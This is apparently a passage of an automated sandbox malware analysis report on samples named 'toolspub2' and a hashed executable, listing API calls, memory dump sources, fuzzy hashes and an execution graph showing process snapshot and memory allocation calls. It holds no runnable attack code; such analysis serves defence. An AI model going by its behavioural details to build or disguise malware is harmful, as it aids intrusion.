                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DecodePointer___libm_error_support
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3413902329-0
                                                                                                                                                              • Opcode ID: 8fed55b8b16d5a488a6f659c673600c9e24e0e5e449c8a8e6e5f730b7deaa70f
                                                                                                                                                              • Instruction ID: a486dd6b7469967ff0a4485c22fdeba358c651907e5a6c41b8ca034f995396dd
                                                                                                                                                              • Opcode Fuzzy Hash: 8fed55b8b16d5a488a6f659c673600c9e24e0e5e449c8a8e6e5f730b7deaa70f
                                                                                                                                                              • Instruction Fuzzy Hash: E5517B7180C709A6DF106B35D9061AE7BA4FF45350F10CABBF8C4A41D1EF3898A0D24B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • _malloc.LIBCMT ref: 004083F8
                                                                                                                                                                • Part of subcall function 00407F97: __FF_MSGBANNER.LIBCMT ref: 00407FB0
                                                                                                                                                                • Part of subcall function 00407F97: __NMSG_WRITE.LIBCMT ref: 00407FB7
                                                                                                                                                                • Part of subcall function 00407F97: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0040A678,00000000,00000001,00000000,?,0040BB44,00000018,0042CF00,0000000C,0040BBD4), ref: 00407FDC
                                                                                                                                                              • _free.LIBCMT ref: 0040840B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap_free_malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1020059152-0
                                                                                                                                                              • Opcode ID: 75877a2e1822163ee47317495c0ea83b80484c0b66870d450e0c6244c0ed3f6c
                                                                                                                                                              • Instruction ID: fc78b206c5da63e7dd5d13e161119ff5467202fc1196a695acbaaa219d7309df
                                                                                                                                                              • Opcode Fuzzy Hash: 75877a2e1822163ee47317495c0ea83b80484c0b66870d450e0c6244c0ed3f6c
                                                                                                                                                              • Instruction Fuzzy Hash: E411C832905612AACF213F35E904A5A37549F80365B20843FF998F62D1FE3C8851969E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00405674
                                                                                                                                                                • Part of subcall function 00407266: _setlocale.LIBCMT ref: 00407278
                                                                                                                                                              • _free.LIBCMT ref: 00405686
                                                                                                                                                                • Part of subcall function 00407F5D: HeapFree.KERNEL32(00000000,00000000,?,00407D41,?), ref: 00407F73
                                                                                                                                                                • Part of subcall function 00407F5D: GetLastError.KERNEL32(?,?,00407D41,?), ref: 00407F85
                                                                                                                                                              • _free.LIBCMT ref: 00405699
                                                                                                                                                              • _free.LIBCMT ref: 004056AC
                                                                                                                                                              • _free.LIBCMT ref: 004056BF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3515823920-0
                                                                                                                                                              • Opcode ID: 477d0e12d415ce0e27a8dff15be26880656b3ec1fd926705981000bb3c49d504
                                                                                                                                                              • Instruction ID: 725eca7d885b881cc8c8b873ebff988813182e83e5bc14f13607900b40e6c06f
                                                                                                                                                              • Opcode Fuzzy Hash: 477d0e12d415ce0e27a8dff15be26880656b3ec1fd926705981000bb3c49d504
                                                                                                                                                              • Instruction Fuzzy Hash: D30170B1A04B409BC620DF19D841A07F7E9EB91B14F154A2FE05AE3680E739F9048A5B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • __getptd.LIBCMT ref: 0040F1DC
                                                                                                                                                                • Part of subcall function 0040C200: __getptd_noexit.LIBCMT ref: 0040C203
                                                                                                                                                                • Part of subcall function 0040C200: __amsg_exit.LIBCMT ref: 0040C210
                                                                                                                                                              • __getptd.LIBCMT ref: 0040F1F3
                                                                                                                                                              • __amsg_exit.LIBCMT ref: 0040F201
                                                                                                                                                              • __lock.LIBCMT ref: 0040F211
                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0040F225
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                              • Opcode ID: e4b8d18ac1d5b823cb758d4da557d8c3d11d1c86cbc39721e7f030f5ffbac894
                                                                                                                                                              • Instruction ID: 253e0b0f263c16fdf6b4621e5ef83b69a379a7f5ae9756f21036c37153ea9268
                                                                                                                                                              • Opcode Fuzzy Hash: e4b8d18ac1d5b823cb758d4da557d8c3d11d1c86cbc39721e7f030f5ffbac894
                                                                                                                                                              • Instruction Fuzzy Hash: C7F0C232A00200DADA30BBA59902B0A32A09B00718F6041BFE8647AAD3CB3C19059A8D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • std::_Mutex::_Mutex.LIBCPMT ref: 004068B5
                                                                                                                                                                • Part of subcall function 004084E8: _malloc.LIBCMT ref: 00408502
                                                                                                                                                              • std::locale::_Init.LIBCPMT ref: 004068D3
                                                                                                                                                                • Part of subcall function 004073C9: __EH_prolog3.LIBCMT ref: 004073D0
                                                                                                                                                                • Part of subcall function 004073C9: std::_Lockit::_Lockit.LIBCPMT ref: 004073E6
                                                                                                                                                                • Part of subcall function 004073C9: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00407408
                                                                                                                                                                • Part of subcall function 004073C9: std::locale::_Setgloballocale.LIBCPMT ref: 00407412
                                                                                                                                                                • Part of subcall function 004073C9: _Yarn.LIBCPMT ref: 00407428
                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004068E7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_std::locale::_$LockitLockit::_$H_prolog3InitLocimpLocimp::_MutexMutex::_SetgloballocaleYarn_malloc
                                                                                                                                                              • String ID: g@
                                                                                                                                                              • API String ID: 3906141431-2607555330
                                                                                                                                                              • Opcode ID: 1abd1b4e7eba0135796e840aa50c82df7ad48c891239ac4ca8817af78c6e9032
                                                                                                                                                              • Instruction ID: 7ceeaa654e45a334c5391fbf28852b0e3a5145a0fd936960374e69fc9abcb302
                                                                                                                                                              • Opcode Fuzzy Hash: 1abd1b4e7eba0135796e840aa50c82df7ad48c891239ac4ca8817af78c6e9032
                                                                                                                                                              • Instruction Fuzzy Hash: 1821F2B5500B00CFD321CF25C590B92BBE0FB98720F108A2EE8969BB91E779B404CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004147D2
                                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 00414805
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 00414836
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 004148A4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                                              • Opcode ID: 07965dacb2f652a297d31451b644f006057e2d3b909b5f31364106603b0c3b74
                                                                                                                                                              • Instruction ID: 94b53389475df4d17abfd998a0c6392ea7761b49d1174936c9a295e363a53524
                                                                                                                                                              • Opcode Fuzzy Hash: 07965dacb2f652a297d31451b644f006057e2d3b909b5f31364106603b0c3b74
                                                                                                                                                              • Instruction Fuzzy Hash: C531E735A00296EFCB20EF64C8809FE3BA5AF82321F15466AE4759B2D1D334DD81DB55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                              • Instruction ID: 37b179b09a40a7a32c929a25efee952e0e3e6cbff0d209da516ced7062632b20
                                                                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                              • Instruction Fuzzy Hash: 0E11723200014ABBCF165E84CC01CEE3F23BB99355B588416FE1859130C73ACAB2AB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00406ED9
                                                                                                                                                                • Part of subcall function 00407822: std::exception::exception.LIBCMT ref: 00407837
                                                                                                                                                                • Part of subcall function 00407822: __CxxThrowException@8.LIBCMT ref: 0040784C
                                                                                                                                                                • Part of subcall function 00407822: std::exception::exception.LIBCMT ref: 0040785D
                                                                                                                                                                • Part of subcall function 00406E57: std::_Xinvalid_argument.LIBCPMT ref: 00406E6A
                                                                                                                                                              • _memmove.LIBCMT ref: 00406F34
                                                                                                                                                              Strings
                                                                                                                                                              • invalid string position, xrefs: 00406ED4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                              • API String ID: 3404309857-1799206989
                                                                                                                                                              • Opcode ID: cc2736de256daf0ba70b4c5e86a3b15cbc0c876003f789ff18af896096f7ad22
                                                                                                                                                              • Instruction ID: d4069e6bb8da39e2fd52404a3e7fab7274e0f592410543c3f6a32a5c81d0a90a
                                                                                                                                                              • Opcode Fuzzy Hash: cc2736de256daf0ba70b4c5e86a3b15cbc0c876003f789ff18af896096f7ad22
                                                                                                                                                              • Instruction Fuzzy Hash: 5711C8313042129BDB24DE19E940A2AB7A9EB81714B12053FF857AB2C6CB75D921C79D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00406CCC
                                                                                                                                                                • Part of subcall function 00407822: std::exception::exception.LIBCMT ref: 00407837
                                                                                                                                                                • Part of subcall function 00407822: __CxxThrowException@8.LIBCMT ref: 0040784C
                                                                                                                                                                • Part of subcall function 00407822: std::exception::exception.LIBCMT ref: 0040785D
                                                                                                                                                              • _memmove.LIBCMT ref: 00406D05
                                                                                                                                                              Strings
                                                                                                                                                              • invalid string position, xrefs: 00406CC7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                              • API String ID: 1785806476-1799206989
                                                                                                                                                              • Opcode ID: e6fc2e2e76330155c899dedf3742fd61ac248dab533920c8b5ac60506055a239
                                                                                                                                                              • Instruction ID: 65e3c1a85f650d3d563dfa77f95bb3982296cf530b7e8f25a001815a5e4149ab
                                                                                                                                                              • Opcode Fuzzy Hash: e6fc2e2e76330155c899dedf3742fd61ac248dab533920c8b5ac60506055a239
                                                                                                                                                              • Instruction Fuzzy Hash: 3C01F5313042554BE3248E6CD98482BB7B6EB81710726493EE4C397685DB78EC5693A8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004067A2
                                                                                                                                                                • Part of subcall function 004070BE: std::ios_base::_Tidy.LIBCPMT ref: 004070DF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::ios_base::_$Ios_base_dtorTidy
                                                                                                                                                              • String ID: @g@$f@
                                                                                                                                                              • API String ID: 3167631304-1575707234
                                                                                                                                                              • Opcode ID: 0caa7ebb214026749c5ce707cff4397635f526cab827a6beb22221b40362136a
                                                                                                                                                              • Instruction ID: bdfc71dde26310aeaefbc04d77f2997331ad58e69e976bcebad799d3ec7d809e
                                                                                                                                                              • Opcode Fuzzy Hash: 0caa7ebb214026749c5ce707cff4397635f526cab827a6beb22221b40362136a
                                                                                                                                                              • Instruction Fuzzy Hash: 560192B12043809FC304DF08C884B5AFBF9FB95324F144A6EE556A73D1D3B9A949CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00408EAF: __getptd.LIBCMT ref: 00408EB5
                                                                                                                                                                • Part of subcall function 00408EAF: __getptd.LIBCMT ref: 00408EC5
                                                                                                                                                              • __getptd.LIBCMT ref: 0040D1B3
                                                                                                                                                                • Part of subcall function 0040C200: __getptd_noexit.LIBCMT ref: 0040C203
                                                                                                                                                                • Part of subcall function 0040C200: __amsg_exit.LIBCMT ref: 0040C210
                                                                                                                                                              • __getptd.LIBCMT ref: 0040D1C1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                              • String ID: csm
                                                                                                                                                              • API String ID: 803148776-1018135373
                                                                                                                                                              • Opcode ID: 6582aeb12a32776248adb9f36ecbbea4aad84ef7a4c0a8635431c8a010ec0117
                                                                                                                                                              • Instruction ID: 2b9f3626bb52547a8883bb3a8012880e400823eb3a29ee6a5b9e7fba5d2ec7e3
                                                                                                                                                              • Opcode Fuzzy Hash: 6582aeb12a32776248adb9f36ecbbea4aad84ef7a4c0a8635431c8a010ec0117
                                                                                                                                                              • Instruction Fuzzy Hash: 30017C38C00204CADF249FE1C45066EB3B5AF68315F64867FE450B66D1CB38C989CE99
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • DecodePointer.KERNEL32(?,0040B840,00000000,00000000,00000000,00000000,00000000,00412818,?,0040AF45,00000003,00407FB5,00000001,00000000,00000000), ref: 0040B812
                                                                                                                                                              • __invoke_watson.LIBCMT ref: 0040B82E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DecodePointer__invoke_watson
                                                                                                                                                              • String ID: PN7w
                                                                                                                                                              • API String ID: 4034010525-3458938079
                                                                                                                                                              • Opcode ID: c1c3af4b505b0c28a499b83dd08b1f7b0961cb9cad86ed7882e9fd5e4c2edc04
                                                                                                                                                              • Instruction ID: 95320dc498d7f7e39fb0afc9680b164e62fed2c37706a4331ee8afaa103fd7c5
                                                                                                                                                              • Opcode Fuzzy Hash: c1c3af4b505b0c28a499b83dd08b1f7b0961cb9cad86ed7882e9fd5e4c2edc04
                                                                                                                                                              • Instruction Fuzzy Hash: E4E0B672100149AFCF012FA1DD058AA3A6AEF84750B548475FE1492171D736D8309A98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00405C19
                                                                                                                                                                • Part of subcall function 00407DF8: std::exception::operator=.LIBCMT ref: 00407E11
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::exception::exceptionstd::exception::operator=
                                                                                                                                                              • String ID: PZ@$PZ@
                                                                                                                                                              • API String ID: 1598257956-1044096902
                                                                                                                                                              • Opcode ID: fbf2c552a1e91c7964ea84d9b70704789819460854b60cf5c869f3b7a3e84cb5
                                                                                                                                                              • Instruction ID: 37a122b39f73fe7cd3bb4d43aa29c6fbc1607298c9878d38a603e8f6bb2784a2
                                                                                                                                                              • Opcode Fuzzy Hash: fbf2c552a1e91c7964ea84d9b70704789819460854b60cf5c869f3b7a3e84cb5
                                                                                                                                                              • Instruction Fuzzy Hash: F8D0E2B26087119BC3249F2A940084AFBF8FF95320302892FA1A8A3740C3B4A841CB98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:4.4%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                              Total number of Nodes:12
                                                                                                                                                              Total number of Limit Nodes:1
                                                                                                                                                              execution_graph 840 2b6b026 841 2b6b035 840->841 844 2b6b7c6 841->844 845 2b6b7e1 844->845 846 2b6b7ea CreateToolhelp32Snapshot 845->846 847 2b6b806 Module32First 845->847 846->845 846->847 848 2b6b815 847->848 849 2b6b03e 847->849 851 2b6b485 848->851 852 2b6b4b0 851->852 853 2b6b4c1 VirtualAlloc 852->853 854 2b6b4f9 852->854 853->854 854->854

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02B6B7EE
                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 02B6B80E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B6B000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_2b6b000_e0cbefcb1af40c7d4aff4aca26621a98.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
